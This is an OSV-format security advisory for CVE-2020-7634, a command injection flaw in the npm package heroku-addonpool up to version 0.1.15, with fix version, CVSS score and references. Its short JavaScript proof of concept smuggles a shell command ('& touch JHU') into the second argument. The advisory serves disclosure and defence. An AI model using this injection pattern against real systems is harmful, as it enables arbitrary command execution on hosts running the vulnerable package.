原始 OSV JSON{
"id": "GHSA-3q9x-w53p-jg53",
"aliases": [
"CVE-2020-7634"
],
"details": "heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function `HerokuAddonPool(id, app, opt)` can be controlled by users without any sanitization.\n\n**PoC**\n```js\nvar Root = require(\"heroku-addonpool\");\nvar root = Root(\"sss\", \"& touch JHU\", {});\nroot.setup();\n```",
"summary": "OS Command Injection in heroku-addonpool",
"affected": [
{
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.16"
}
]
}
],
"package": {
"name": "heroku-addonpool",
"ecosystem": "npm"
}
}
],
"modified": "2023-09-13T21:57:41Z",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"published": "2021-12-09T19:52:03Z",
"references": [
{
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7634",
"type": "ADVISORY"
},
{
"url": "https://github.com/nodef/heroku-addonpool/commit/b1a5b316473ac92d783f3d54ee048d54082da38d",
"type": "WEB"
},
{
"url": "https://github.com/nodef/heroku-addonpool/blob/master/index.js",
"type": "WEB"
},
{
"url": "https://snyk.io/vuln/SNYK-JS-HEROKUADDONPOOL-564428",
"type": "WEB"
}
],
"schema_version": "1.4.0",
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"severity": "CRITICAL",
"github_reviewed": true,
"nvd_published_at": "2020-04-06T13:15:00Z",
"github_reviewed_at": "2021-05-24T22:14:43Z"
}
}